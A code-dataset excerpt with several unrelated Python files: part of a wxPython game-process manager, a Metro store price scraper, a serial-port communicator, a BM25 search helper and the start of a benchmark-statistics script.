self.NewChange:\n return\n rows = self.GetNumberRows()\n # cols = self.GetNumberCols()\n csvFP = open(os.path.realpath(self.csvFile), 'w')\n csvObj = csv.writer(csvFP)\n csvObj.writerow(list(self.GetRowHeader()))\n for row in range(rows):\n rValue = list(self.GetRowValue(row))\n if psutil.pid_exists(int(rValue[3])):\n csvObj.writerow(rValue)\n else:\n rValue[3] = str(FindProcess(rValue[0], rValue[1], rValue[2]))\n rValue[4] = \"异常\"\n colour = wx.RED if int(rValue[3]) == -1 else wx.BLACK\n self.SetRowValue(row, rValue, colour, False)\n csvObj.writerow(rValue)\n csvFP.close()\n self.NewChange = False\n\n # 表格刷新\n def RefreshTable(self, e):\n rows = self.GetNumberRows()\n if rows > 1:\n for row in range(rows):\n rValue = list(self.GetRowValue(row))\n if psutil.pid_exists(int(rValue[3])) and int(rValue[3]) != 0:\n continue\n else:\n wx.CallAfter(self.ReSetRowValue, row=row, rValue=rValue)\n else:\n self.SetRowValueFromCsv()\n if e:\n e.Skip()\n\n # 重新设置表格值\n def ReSetRowValue(self, row, rValue):\n self.NewChange = True\n pid = FindProcess(rValue[0], rValue[1], rValue[2])\n rValue[3] = str(pid)\n rValue[4] = \"异常\" if int(rValue[3]) == -1 else \"正常\"\n colour = wx.RED if int(rValue[3]) == -1 else wx.BLACK\n self.SetRowValue(row, rValue, colour, False)\n\n # 从csv初始化表格\n def SetRowValueFromCsv(self):\n self.NewChange = True\n try:\n self.CreateGrid(0, 5)\n except Exception as e:\n print(e)\n if not os.path.isfile(self.csvFile):\n for index, data in enumerate(['目录', '进程名', '参数', 'Pid', '状态']):\n self.SetColLabelValue(index, data)\n return\n with open(self.csvFile, 'rb') as csvFile:\n csvFile.seek(0)\n try:\n dialect = csv.Sniffer().sniff(csvFile.read(1024))\n except Exception as e:\n print(e)\n return\n csvFile.seek(0)\n csvreader = list(csv.reader(csvFile, dialect))\n rows = len(csvreader)\n cols = len(csvreader[0])\n for index, data in enumerate(csvreader[0]):\n self.SetColLabelValue(index, data)\n for row in range(1, rows):\n rValue = csvreader[row]\n if not psutil.pid_exists(int(rValue[3])) or int(rValue[3]) == 0:\n rValue[3] = FindProcess(rValue[0], rValue[1], rValue[2])\n self.AddCellValue(rValue)\n\n\n# TODO: 树形结构执行任务\nclass ThreadTask(threading.Thread):\n def __init__(self, **kwargs):\n super(ThreadTask, self).__init__()\n self.__flag = threading.Event()\n self.__flag.set()\n self.__running = threading.Event()\n self.__running.set()\n self.setDaemon(True)\n self.kwargs = kwargs\n\n self.parent = self.kwargs.get('parent', None)\n self.BindId = self.kwargs.get('BindId', None)\n\n self.root = self.parent.root\n self.menuBar = self.root.GetMenuBar()\n self.toolbar = self.root.GetToolBar()\n\n self.treectrl = self.parent.PageOne.LeftPanel\n self.gridctrl = self.parent.PageOne.RightPanel\n self.logctrl = self.parent.PageTwo\n\n def pause(self):\n self.__flag.clear()\n self.root.SetStatusText(\"暂停\", 2)\n self.logctrl.AppendInfo('暂停')\n return gc.collect()\n\n def restart(self):\n self.__flag.set()\n self.root.SetStatusText(\"继续\", 2)\n self.logctrl.AppendInfo('继续')\n return gc.collect()\n\n def isPaused(self):\n return self.__flag.isSet()\n\n def isStoped(self):\n return not self.__running.isSet()\n\n def stop(self):\n # self.treectrl.Enable(True)\n self.__running.clear()\n self.__flag.set()\n wx.CallAfter(self.gridctrl.SaveToCsv)\n if (self.menuBar.FindItemById(ID_REDIS).IsChecked()) and self.BindId == ID_Close:\n self.parent.SaveRedis()\n if (self.menuBar.FindItemById(ID_MONGO).IsChecked()) and self.BindId == ID_Close:\n self.parent.SaveMongo()\n if (self.menuBar.FindItemById(ID_AFTER).IsChecked()):\n self.after()\n self.root.SetStatusText(\"停止\", 2)\n self.logctrl.AppendInfo('停止')\n return gc.collect()\n\n def befor(self):\n if os.path.isfile(PRE_PY_SCRIPT) and os.path.splitext(PRE_PY_SCRIPT)[1].lower() == '.py':\n self.root.SetStatusText(PRE_PY_SCRIPT, 0)\n self.root.SetStatusText(\"正在执行外部脚本...\", 1)\n self.logctrl.AppendWarn('正在执行外部脚本,{0}'.format(PRE_PY_SCRIPT))\n os.popen(\"python \" + PRE_PY_SCRIPT)\n self.root.SetStatusText(\"脚本调用结束\", 1)\n self.logctrl.AppendInfo('脚本调用结束')\n\n else:\n self.root.SetStatusText(\"外部准备脚本不存在\", 1)\n self.logctrl.AppendError('外部准备脚本不存在,{0}'.format(PRE_PY_SCRIPT))\n\n def after(self):\n if os.path.isfile(AFTER_PY_SCRIPT) and os.path.splitext(AFTER_PY_SCRIPT)[1].lower() == '.py':\n self.root.SetStatusText(AFTER_PY_SCRIPT, 0)\n self.root.SetStatusText(\"正在执行外部脚本...\", 1)\n self.logctrl.AppendWarn('正在执行外部脚本,{0}'.format(AFTER_PY_SCRIPT))\n os.popen(\"python \" + AFTER_PY_SCRIPT)\n self.root.SetStatusText(\"脚本调用结束\", 1)\n self.logctrl.AppendInfo('脚本调用结束')\n else:\n self.root.SetStatusText(\"外部恢复脚本不存在\", 1)\n self.logctrl.AppendError('外部准备脚本不存在,{0}'.format(AFTER_PY_SCRIPT))\n\n def run(self):\n # self.treectrl.Enable(False)\n itemList = self.kwargs.get('ProcessList', None)\n if (self.menuBar.FindItemById(ID_PREPARE).IsChecked()):\n self.befor()\n if not itemList:\n wx.CallAfter(self.gridctrl.SaveToCsv)\n return gc.collect()\n if self.BindId == ID_Close:\n itemList.reverse()\n for index, item in enumerate(itemList):\n self.__flag.wait()\n if not self.__running.isSet():\n return gc.collect()\n dirPath = os.path.dirname(item)\n exeName = os.path.basename(item)\n parameters = self.parent.GetParameters(os.path.splitext(exeName)[0])\n if parameters:\n for parameter in parameters:\n if self.BindId == ID_Start:\n self.openJob(exeName, parameter, dirPath)\n else:\n self.killJob(exeName, parameter, dirPath)\n else:\n if self.BindId == ID_Start:\n self.openJob(exeName, \"\", dirPath)\n else:\n self.killJob(exeName, \"\", dirPath)\n self.stop()\n self.toolbar.ToggleBitmap(self.BindId)\n self.root.SetStatusText(\"完成\", 2)\n\n def openJob(self, exe, arg, workdir):\n row, pid = self.gridctrl.FindRowByValue([workdir, exe, arg], 3)\n if row != -1:\n self.gridctrl.SelectRow(row)\n fpid = FindProcess(workdir, exe, arg)\n self.logctrl.AppendWarn(\"准备开启进程'{0} {1}',工作路径为'{1}'\".format(exe, arg, workdir))\n # 查看进程是否已开启\n if psutil.pid_exists(int(fpid)):\n BoxID = self.root.warnBox(\n \"'{0}'似乎已开启,检测到Pid为'{1}', \\n确认是否跳过!\".format(os.path.join(workdir, exe) + \" \" + arg, fpid))\n self.logctrl.AppendWarn(\n \"'{0}'似乎已开启,检测到Pid为'{1}', \\n确认是否跳��!\".format(os.path.join(workdir, exe) + \" \" + arg, fpid))\n if BoxID == wx.ID_OK:\n self.root.SetStatusText(\"跳过开启进程{0} {1}\".format(exe, arg), 1)\n self.logctrl.AppendWarn(\"跳过开启进程{0} {1}\".format(exe, arg))\n if int(pid) != int(fpid):\n pid = fpid\n RowValueList = [workdir, exe, arg, pid, \"正常\"]\n self.gridctrl.AddCellValue(RowValueList)\n # wx.CallAfter(self.gridctrl.SaveToCsv)\n gc.collect()\n return\n self.logctrl.AppendWarn(\"继续开启进程{0}\".format(exe))\n\n GetChdir(workdir)\n cmdLine = \"start {0} {1}\".format(exe, \" \".join(arg.split(\",\")))\n os.popen(cmdLine)\n # 新产生pid\n newPid = FindProcess(workdir, exe, arg)\n pid = SystemWindow.StartServer(newPid)\n RowValueList = [workdir, exe, arg, pid, \"正常\"]\n # 执行失败\n if not psutil.pid_exists(int(pid)):\n BoxID = self.root.errorBox(\"'{0} {1}'开服失败,请排查原因!\".format(os.path.join(workdir, exe), arg))\n self.logctrl.AppendError(\"'{0} {1}'开服失败,请排查原因!\".format(os.path.join(workdir, exe), arg))\n if BoxID == wx.ID_OK:\n self.root.SetStatusText(\"开启进程{0} {1}失败\".format(exe, arg), 1)\n else:\n self.root.SetStatusText(\"成功开启进程'{0} {1}',pid={2}\".format(exe, arg, pid), 1)\n self.logctrl.AppendInfo(\"成功开启进程'{0} {1}',pid={2}\".format(exe, arg, pid))\n\n self.gridctrl.AddCellValue(RowValueList)\n GetChdir(scriptDir)\n # wx.CallAfter(self.gridctrl.SaveToCsv)\n wait_time(TIME_SLEEP)\n return pid\n\n def killJob(self, exe, arg, workdir):\n # 查看表格中是否有相关项\n row, pid = self.gridctrl.FindRowByValue([workdir, exe, arg], 3)\n if row != -1:\n self.gridctrl.SelectRow(row)\n # 查找进程中是否有相关项\n if not psutil.pid_exists(int(pid)):\n pid = int(FindProcess(workdir, exe, arg))\n elif not psutil.Process(int(pid)).name().lower() == exe.lower():\n pid = int(FindProcess(workdir, exe, arg))\n elif not IsSameDir(psutil.Process(int(pid)).cwd(), workdir):\n pid = int(FindProcess(workdir, exe, arg))\n elif not psutil.Process(int(pid)).cmdline()[1:] == arg.strip().split():\n pid = int(FindProcess(workdir, exe, arg))\n else:\n pid = int(pid)\n self.logctrl.AppendInfo(\"准备关闭进程'{0} {1}',工作路径为'{2}',pid={3}\".format(exe, arg, workdir, str(pid)))\n # 如果没有进程,则把信息保存到表格和csv文件,并跳过\n if not psutil.pid_exists(pid) or pid == 0:\n RowValueList = [workdir, exe, arg, -1, \"异常\"]\n if row != -1:\n self.gridctrl.ReSetRowValue(row, RowValueList)\n # else:\n # self.gridctrl.AddCellValue(RowValueList)\n # wx.CallAfter(self.gridctrl.SaveToCsv)\n self.root.SetStatusText(\"进程'{0} {1}'不存在\".format(exe, arg), 1)\n self.logctrl.AppendError(\"进程'{0} {1}'不存在\".format(exe, arg))\n return\n # 根据pid杀进程\n try:\n SystemWindow.CloseWindowByPid(pid)\n self.root.SetStatusText(\"成功关闭进程'{0} {1}',pid={2}\".format(exe, arg, pid), 1)\n self.logctrl.AppendInfo(\"成功关闭进程'{0} {1}',pid={2}\".format(exe, arg, pid))\n pid = -1\n except Exception as e:\n self.root.SetStatusText(\"关闭进程'{0} {1}'操作异常,pid={2}\".format(exe, arg, pid), 1)\n self.logctrl.AppendError(\"关闭进程'{0} {1}'操作异常,pid={2}\\n{3}\".format(exe, arg, pid, e))\n\n # 保存信息\n RowValueList = [workdir, exe, arg, str(pid), \"异常\"]\n self.gridctrl.AddCellValue(RowValueList)\n # wx.CallAfter(self.gridctrl.SaveToCsv)\n wait_time(TIME_SLEEP)\n return pid\n\n\n# TODO: 表格右键菜单执行任务\nclass GridThreadTask(threading.Thread):\n def __init__(self, **kwargs):\n super(GridThreadTask, self).__init__()\n self.__flag = threading.Event()\n self.__flag.set()\n self.__running = threading.Event()\n self.__running.set()\n self.setDaemon(True)\n self.kwargs = kwargs\n\n self.parent = self.kwargs.get('parent', None)\n self.root = self.parent.root\n self.logctrl = self.parent.parent.parent.PageTwo\n\n self.BindId = self.kwargs.get('BindId', None)\n self.row = int(self.kwargs.get('row', None))\n self.rValue = self.kwargs.get('rValue', None)\n self.rmRow = self.kwargs.get('rmRow', False)\n\n def pause(self):\n self.__flag.clear()\n\n def restart(self):\n self.__flag.set()\n\n def isPaused(self):\n return self.__flag.isSet()\n\n def isStoped(self):\n return not self.__running.isSet()\n\n def stop(self):\n self.__running.clear()\n self.__flag.set()\n wx.CallAfter(self.parent.SaveToCsv)\n return gc.collect()\n\n def run(self):\n while self.__running.isSet():\n self.__flag.wait()\n dirPath = self.rValue[0]\n exeName = self.rValue[1]\n arg = self.rValue[2]\n if self.BindId == ID_Start:\n self.openJob(exeName, arg, dirPath)\n else:\n self.killJob(exeName, arg, dirPath)\n self.stop()\n\n def openJob(self, exe, arg, workdir):\n self.parent.SelectRow(self.row)\n self.logctrl.AppendInfo(\"准备开启进程'{0} {1}',工作路径为'{2}'\".format(exe, arg, workdir))\n pid = FindProcess(self.rValue[0], self.rValue[1], self.rValue[2])\n # 查看进程是否已开启\n if psutil.pid_exists(int(pid)):\n BoxID = self.parent.root.warnBox(\n \"'{0}'似乎已开启,检测到Pid为'{1}', \\n确认是否跳过!\".format(os.path.join(workdir, exe) + \" \" + arg, pid))\n\n self.logctrl.AppendWarn(\n \"'{0}'似乎已开启,检测到Pid为'{1}', \\n确认是否跳过!\".format(os.path.join(workdir, exe) + \" \" + arg, pid))\n\n if BoxID == wx.ID_OK:\n self.root.SetStatusText(\"跳过开启进程{0} {1}\".format(exe, arg), 1)\n self.logctrl.AppendWarn(\"跳过开启进程{0} {1}\".format(exe, arg))\n self.rValue[3] = pid\n self.parent.ReSetRowValue(self.row, self.rValue)\n # wx.CallAfter(self.parent.SaveToCsv)\n return gc.collect()\n self.logctrl.AppendWarn(\"继续开启进程{0} {1}\".format(exe, arg))\n if type(workdir) is str:\n workdir = workdir.decode('utf-8')\n GetChdir(workdir)\n cmdLine = \"start {0} {1}\".format(exe, \" \".join(arg.split(\",\")))\n os.popen(cmdLine)\n\n # 新产生pid\n newPid = FindProcess(self.rValue[0], self.rValue[1], self.rValue[2])\n pid = SystemWindow.StartServer(newPid)\n # 执行失败\n if not psutil.pid_exists(int(pid)):\n BoxID = self.root.errorBox(\"'{0} {1}'开服失败,请排查原因!\".format(os.path.join(workdir, exe), arg))\n self.logctrl.AppendError(\"'{0} {1}'开服失败,请排查原因!\".format(os.path.join(workdir, exe), arg))\n if BoxID == wx.ID_OK:\n self.root.SetStatusText(\"开启进程{0} {1}失败\".format(exe, arg), 1)\n self.rValue[3] = -1\n self.parent.ReSetRowValue(self.row, self.rValue)\n # wx.CallAfter(self.parent.SaveToCsv)\n return -1\n\n self.root.SetStatusText(\"成功开启进程'{0} {1}',pid={2}\".format(exe, arg, pid), 1)\n self.logctrl.AppendInfo(\"成功开启进程'{0} {1}',pid={2}\".format(exe, arg, pid))\n self.rValue[3] = pid\n self.parent.ReSetRowValue(self.row, self.rValue)\n GetChdir(scriptDir)\n # wx.CallAfter(self.parent.SaveToCsv)\n wait_time(TIME_SLEEP)\n return pid\n\n def killJob(self, exe, arg, workdir):\n self.parent.SelectRow(self.row)\n # 查看表格中是否有相关项\n pid = self.rValue[3]\n if not psutil.pid_exists(int(pid)):\n pid = int(FindProcess(workdir, exe, arg))\n elif not psutil.Process(int(pid)).name().lower() == exe.lower():\n pid = int(FindProcess(workdir, exe, arg))\n elif not IsSameDir(psutil.Process(int(pid)).cwd(), workdir):\n pid = int(FindProcess(workdir, exe, arg))\n elif not psutil.Process(int(pid)).cmdline()[1:] == arg.strip().split():\n pid = int(FindProcess(workdir, exe, arg))\n else:\n pid = int(pid)\n self.logctrl.AppendInfo(\"准备关闭进程'{0} {1}',工作路径为'{2}',pid={3}\".format(exe, arg, workdir, pid))\n\n # 如果没有进程,则把信息保存到表格和csv文件,并跳过\n if not psutil.pid_exists(pid) or pid == 0:\n self.root.SetStatusText(\"进程'{0} {1}'不存在\".format(exe, arg), 1)\n self.logctrl.AppendError(\"进程'{0} {1}'不存在\".format(exe, arg))\n self.rValue[3] = -1\n if not self.rmRow:\n self.parent.ReSetRowValue(self.row, self.rValue)\n # wx.CallAfter(self.parent.SaveToCsv)\n return\n # 根据pid杀进程\n try:\n # os.kill(pid, 9)\n # rtn = os.popen(\"taskkill /PID:{0} /F /T\".format(pid)).read().decode('gbk')\n SystemWindow.CloseWindowByPid(pid)\n self.root.SetStatusText(\"成功关闭进程'{0} {1}',pid={2}\".format(exe, arg, pid), 1)\n self.logctrl.AppendInfo(\"成功关闭进程'{0} {1}',pid={2}\".format(exe, arg, pid))\n pid = -1\n except Exception as e:\n self.root.SetStatusText(\"关闭���程'{0}'操作异常,pid={1}\".format(exe, pid), 1)\n self.logctrl.AppendError(\"关闭进程'{0}'操作异常,pid={1}\\n{2}\".format(exe, pid, e))\n self.rValue[3] = pid\n # 保存信息\n if not self.rmRow:\n self.parent.ReSetRowValue(self.row, self.rValue)\n # wx.CallAfter(self.parent.SaveToCsv)\n wait_time(TIME_SLEEP)\n return pid\n\n\n# TODO: 最小化托盘\nclass TaskBarIcon(wx.adv.TaskBarIcon):\n def __init__(self, frame):\n super(TaskBarIcon, self).__init__()\n self.MainFrame = frame\n self.initID()\n self.initUI()\n self.initBind()\n\n # 生成组件ID\n def initID(self):\n self.ViewID = wx.NewId()\n\n # 生成界面\n def initUI(self):\n self.settings()\n\n # 事件监控\n def initBind(self):\n self.Bind(wx.adv.EVT_TASKBAR_LEFT_DCLICK, self.OnDclick)\n # 监听菜单栏中的退出选项\n\n # 基础设置\n def settings(self):\n from wx.lib.embeddedimage import PyEmbeddedImage\n icon = PyEmbeddedImage(B64_POKER128).GetIcon()\n if self.MainFrame.IsShown():\n self.MainFrame.Hide()\n self.SetIcon(icon, u'游戏进程管理器')\n\n # 生成最小化菜单, 默认右键单击调用PopupMenu方法呼出菜单\n def CreatePopupMenu(self):\n self.TaskBarIconMenu = wx.Menu()\n # self.ExitMenu = wx.Menu()\n\n self.TaskBarIconMenu.AppendSeparator()\n self.TaskBarIconMenu.Append(self.ViewID, u\"显示主界面(&M)\")\n self.TaskBarIconMenu.Append(ID_OpenDir, u\"打开目录(&O)\", u\"打开目录\")\n self.TaskBarIconMenu.AppendSeparator()\n self.TaskBarIconMenu.Append(wx.ID_EXIT, u\"退出(&X)\")\n\n self.TaskBarIconMenu.Bind(wx.adv.EVT_TASKBAR_LEFT_DCLICK, self.OnDclick)\n self.TaskBarIconMenu.Bind(wx.EVT_MENU, self.OnDclick, id=self.ViewID)\n self.TaskBarIconMenu.Bind(wx.EVT_MENU, self.OpenWorkDir, id=ID_OpenDir)\n self.TaskBarIconMenu.Bind(wx.EVT_MENU, self.OnExit, id=wx.ID_EXIT)\n return self.TaskBarIconMenu\n\n # 单击, 当前没有使用\n def OnClick(self, e):\n self.MainFrame.IsIconized()\n if e:\n e.Skip()\n\n # 双击展示主面板\n def OnDclick(self, e):\n # Destroy删除元素,无法恢复创建\n self.Destroy()\n self.MainFrame.Restore()\n self.MainFrame.Raise()\n if e:\n e.Skip()\n\n def OpenWorkDir(self, e):\n toolpath = os.path.splitext(scriptPath)[0] + '.exe'\n explorer_select_file(toolpath)\n if e:\n e.Skip()\n\n # 退出\n def OnExit(self, e):\n # 托盘图标销毁\n self.Destroy()\n # 主面板销毁\n # self.MainFrame.Destroy()\n self.MainFrame.OnExit(e)\n # 退出wx进程\n # wx.Exit()\n if e:\n e.Skip()\n\n\n# TODO: 主进程\nclass NewApp(wx.App):\n def __init__(self):\n super(NewApp, self).__init__(redirect=sys.stderr, filename='./ProcessManagerError.log')\n\n def OnInit(self):\n window = RootFrame()\n window.Show()\n return True\n\n\nif __name__ == '__main__':\n multiprocessing.freeze_support()\n app = NewApp()\n app.MainLoop()\n # pyinstaller -w -F -p \"E:\\Git\\wxPython\\common;C:\\Python27\" -i E:\\Git\\wxPython\\icon\\poker.ico ProcessManager.py\n","sub_path":"ProcessManager - 副本.py","file_name":"ProcessManager - 副本.py","file_ext":"py","file_size_in_byte":62283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"432273697","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport csv\nimport core_shopping_list\n\ndef metro_parse(url,substitution=dict()):\n ### Внимание! Функция парсит только Первую страницу каждого урла ###\n browser = webdriver.PhantomJS()\n browser.get(url)\n html = browser.page_source\n soup = BeautifulSoup(html)\n section = soup.find(\"div\",{\"class\": \"items\"})\n articles = section.find_all(\"div\",{\"class\":\"catalog-i\"})\n products =[]\n for article in articles:\n name_src = article.find(\"span\",{\"class\":\"title\"})\n art = article.find(\"span\",{\"class\":\"article\"})\n price_full = article.find(\"div\",{\"price_cnt\"})\n price_int_src = price_full.find(\"span\",{\"class\":\"int\"})\n price_float_src = price_full.find(\"span\",{\"class\":\"float\"})\n name = name_src.text\n price = price_int_src.text + '.' + price_float_src.text\n for key in substitution:\n if name == key:\n products.append({\n 'title': substitution[key],\n 'price': price\n }) \n return products \n\ndef main():\n change = change = core_shopping_list.substitution('metro')\n\n url_list =['https://msk.metro-cc.ru/category/produkty/bakaleya/makaronnye-izdeliya?price_range=11%3B1361&brands=&in_stock=1&attrs=&sorting=0&limit=72&virtual_stock=0',\n 'https://msk.metro-cc.ru/category/produkty/ovoschi-griby/101009003-konservirovannye?price_range=27%3B3397&brands=&in_stock=1&attrs=&attr%5B253%5D%5Bfrom%5D=0&attr%5B253%5D%5Bto%5D=0&sorting=0&limit=72&virtual_stock=0',\n 'https://msk.metro-cc.ru/category/produkty/holodnye-napitki/soki-morsy-nektary?price_range=15%3B1693&brands=&in_stock=1&attrs=&attr%5B181%5D%5Bfrom%5D=0&attr%5B181%5D%5Bto%5D=0&sorting=0&limit=72&virtual_stock=0', \n ]\n\n product_list_metro =[]\n for url in url_list:\n for page in range(1,10):\n url_page = url+'&page='+ str(page)\n product_list_metro += metro_parse(url_page,change) \n temp=[]\n for item in product_list_metro:\n if item not in temp:\n temp.append(item)\n product_list_metro = temp\n with open('metro.csv','w', encoding='utf-8') as f:\n fields = ['title', 'price']\n writer =csv.DictWriter(f,fields,delimiter =';')\n for item in product_list_metro:\n writer.writerow(item)\n \n\nif __name__ == \"__main__\":\n main()","sub_path":"metro_parser.py","file_name":"metro_parser.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"52280352","text":"# -*- encoding: utf-8 -*-\n\nimport json\nfrom threading import Thread\nimport logging\nimport serial\nimport time\n\nlogger = logging.getLogger(__name__)\n\n\nclass WarehouseCommunicator(Thread):\n x = 0\n y = 0\n z = 0\n\n def __init__(self, level=logging.INFO, port='/dev/ttyAMA0', baudrate=115200,\n parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS):\n Thread.__init__(self)\n logging.basicConfig()\n logger.setLevel(level)\n formatter = logging.Formatter(\"%(asctime)s %(threadName)-11s %(levelname)-10s %(message)s\")\n self.serial = serial.Serial(port=port, baudrate=baudrate, bytesize=bytesize,\n stopbits=stopbits, parity=parity, timeout=3.0)\n self.daemon = True\n logger.info(\"STM <--> Raspberry communication started!\")\n\n def run(self):\n while True:\n for line in self.serial:\n try:\n parsed_line = json.loads(line[-29:])\n if parsed_line['x'] != self.x or parsed_line['y'] != self.y or parsed_line['z'] != self.z:\n logger.info(\"Received: \" + line)\n\n self.x = parsed_line['x']\n self.y = parsed_line['y']\n self.z = parsed_line['z']\n except Exception as exc:\n logger.error(exc)\n\n def send(self, command, value=99):\n if value < 0:\n value = 0\n logger.error(\"Wrong value!\" + ':' + str(command).zfill(2) + '-' + str(value).zfill(8))\n\n command_string = ':' + str(command).zfill(2) + '-' + str(value).zfill(8) + '\\r\\n'\n logger.debug(\"Sent: \" + command_string)\n self.serial.write(command_string)\n time.sleep(0.01)\n","sub_path":"WarehouseServer/serial_thread.py","file_name":"serial_thread.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"494755600","text":"from gensim.summarization import bm25\nfrom glob import glob\nimport re\nfrom heapq import nlargest\n\n\nclass Utils:\n word_regex = r\"[\\w'-]+\"\n\n def __init__(self, collection_path):\n corpus = []\n self.test_files = glob(collection_path + '*.txt')\n self.num_docs = len(self.test_files)\n for file in self.test_files:\n doc = []\n with open(file) as text:\n for line in text:\n for word in re.findall(Utils.word_regex, line):\n doc.append(word.lower())\n corpus.append(doc)\n self.bm25_obj = bm25.BM25(corpus=corpus)\n self.avg_idf = sum(map(lambda k: float(self.bm25_obj.idf[k]), self.bm25_obj.idf.keys())) / len(\n self.bm25_obj.idf.keys())\n\n def best(self, n: int, query_str: str):\n query_doc = [word.lower() for word in re.findall(Utils.word_regex, query_str)]\n scores = self.bm25_obj.get_scores(query_doc, self.avg_idf)\n doc_ids = [i for i in range(self.num_docs)]\n best_ids = nlargest(n, doc_ids, key=lambda i: scores[i])\n return [self.test_files[doc_id] for doc_id in best_ids]\n\n\nif __name__ == '__main__':\n utils = Utils('D:/test files/')\n print(utils.best(3, 'France'))\n","sub_path":"BM25/bm25_utils.py","file_name":"bm25_utils.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"107422832","text":"import sys\nimport os\nimport math\nfrom operator import add\nimport statistics\nfrom scipy.stats import t\nfrom itertools import zip_longest\n\nimport click\n\nBASE_PATH = os.path.dirname(os.path.realpath(__file__))\nDATA_PATH = os.path.join(BASE_PATH, \"../../stats\")\n\n\nMEAN_MAX = 9999999\n\n@click.group()\ndef cli():\n pass\n\n@cli.command()\n@click.argument('path')\n@click.argument('prefix')\ndef db(path, prefix):\n global DATA_PATH\n if not os.path.isdir(path):\n click.echo('{}: {}'\n .format(sys.argv[0],\n click.style('provided path `'+path+'` is no directory', fg='red')))\n sys.exit(1)\n DATA_PATH = os.path.join(BASE_PATH, \"../../stats\", prefix)\n if not os.path.exists(DATA_PATH):\n os.makedirs(DATA_PATH)\n analyze_logs(path)\n\n\ndef analyze_logs(path):\n subdirs = [os.path.join(path, p) for p in os.listdir(path) if os.path.isdir(os.path.join(path, p))]\n\n # reach leaf directory, try to analyze\n if len(subdirs) == 0:\n if path.find('response-time') != -1:\n analyze_db_leaf(path)\n else:\n for p in subdirs:\n click.echo(p)\n if p.find('middleware') != -1:\n analyze_mw_logs(p)\n elif p.find('mload') != -1 or p.find('middleware') != -1:\n analyze_mload_logs(p)\n else:\n analyze_logs(p)\n\n\ndef analyze_mw_logs(path):\n subdirs = [os.path.join(path, p) for p in os.listdir(path) if os.path.isdir(os.path.join(path, p))]\n\n for sp in subdirs:\n if sp.find('backendDuration') != -1 or sp.find('totalDuration') != -1 or sp.find('backendQueue') != -1:\n analyze_mw_leaf(sp, os.path.basename(path))\n\ndef analyze_mload_logs(path):\n subdirs = [os.path.join(path, p) for p in os.listdir(path) if os.path.isdir(os.path.join(path, p))]\n\n num_threads = path.split('-')[-1]\n data = {}\n for p in subdirs:\n data[p] = analyze_db_leaf(p)\n\n fpath = os.path.join(DATA_PATH, get_name(path), num_threads+'')\n if not os.path.exists(fpath):\n os.makedirs(fpath)\n\n (tp_mean, tp_stdev, rt_mean, rt_stdev, gi) = calculate_stats(data, fpath)\n\n\n click.echo('mload summary response-time mean: {:10.3f}\\t\\tstdev: {:10.3f}'.format(rt_mean, rt_stdev))\n\n with open(os.path.join(os.path.join(DATA_PATH, 'mload/mload-response-time-stats.txt')), 'a') as f:\n f.write(num_threads+'\\t')\n f.write('\\t'.join('{:10.3f}'.format(x) for x in [rt_mean, rt_stdev]))\n f.write('\\n')\n\n click.echo('throughput mean: {:10.3f}\\t\\tstdev: {:10.3f}'.format(tp_mean, tp_stdev))\n with open(os.path.join(os.path.join(DATA_PATH, 'mload/mload-throughput-stats.txt')), 'a') as f:\n f.write(num_threads+'\\t')\n f.write('\\t'.join('{:10.3f}'.format(x) for x in [tp_mean, tp_stdev]))\n f.write('\\n')\n\n\ndef grouper(iterable, n, fillvalue=None):\n args = [iter(iterable)] * n\n return zip_longest(*args, fillvalue=fillvalue)\n\ndef calculate_stats(data, path, no_calc=False):\n click.echo(\"Use path \"+path)\n f_rt_over_time = open(os.path.join(path, 'response-time-over-time.txt'), 'wt')\n f_tp_over_time = open(os.path.join(path, 'throughput-over-time.txt'), 'wt')\n f_rt = open(os.path.join(path, 'experiment-response-time.txt'), 'wt')\n f_tp = open(os.path.join(path, 'experiment-throughput.txt'), 'wt')\n\n tp_over_time = []\n throughputs = []\n tp_experiments = []\n rt_experiments = []\n\n tp_experiment_collector = []\n rt_experiment_collector = []\n\n flat_rts = []\n grouped_intervals = []\n\n count = 0\n i = 0\n for interval_data in zip(*data.values()):\n flat_interval = [x for l in interval_data for x in l]\n flat_rts += flat_interval\n grouped_intervals.append(flat_interval)\n throughputs.append(len(flat_interval))\n \n if no_calc: continue\n try:\n f_tp_over_time.write('{}\\t{:10.3f}\\n'.format(i, len(flat_interval)))\n mean = statistics.mean(flat_interval)\n f_rt_over_time.write('{}\\t{:10.3f}\\t{:10.3f}\\n'.format(i, mean,\n statistics.stdev(flat_interval, mean)))\n i += 1\n except statistics.StatisticsError as e:\n click.echo(click.style('Interval {} is empty'.format(len(throughputs)+1)))\n\n if len(tp_experiment_collector) == 60:\n mean = statistics.mean(tp_experiment_collector)\n stdev = statistics.stdev(tp_experiment_collector, mean)\n f_tp.write('{}\\t{:10.3f}\\t{:10.3f}\\n'.format(count, mean, stdev))\n tp_experiments.append((mean, stdev))\n tp_experiment_collector = []\n count += 5\n tp_experiment_collector.append(len(flat_interval))\n\n if no_calc:\n return (0, 0, 0, 0, grouped_intervals)\n\n click.echo('calculate TP confidence for {} with {} samples'.format(path, len(tp_experiments)))\n tp_mean, tp_stdev, found = get_confidence_interval(tp_experiments, 0.15)\n if not found:\n click.echo(click.style(\"Throughput: Could not match confidence interval\", fg='red'))\n rt_stats = []\n count = 0\n for experiment in grouper(flat_rts, 100000, MEAN_MAX):\n if experiment[-1] == MEAN_MAX:\n break\n mean = statistics.mean(experiment)\n stdev = statistics.stdev(experiment, mean)\n f_rt.write('{}\\t{:10.3f}\\t{:10.3f}\\n'.format(count,mean, stdev))\n count += 1\n rt_stats.append((mean, stdev))\n\n click.echo('calculate RT confidence for {} with {} samples'.format(path, len(rt_stats)))\n rt_mean, rt_stdev, found = get_confidence_interval(rt_stats, 0.05)\n if not found:\n click.echo(click.style(\"Response Time: Could not match confidence interval\", fg='red'))\n\n return (tp_mean, tp_stdev, rt_mean, rt_stdev, grouped_intervals)\n\n\ndef get_confidence_interval(experiment, signi):\n tt = t.ppf(1-(signi/2.0), len(experiment)-1)\n\n 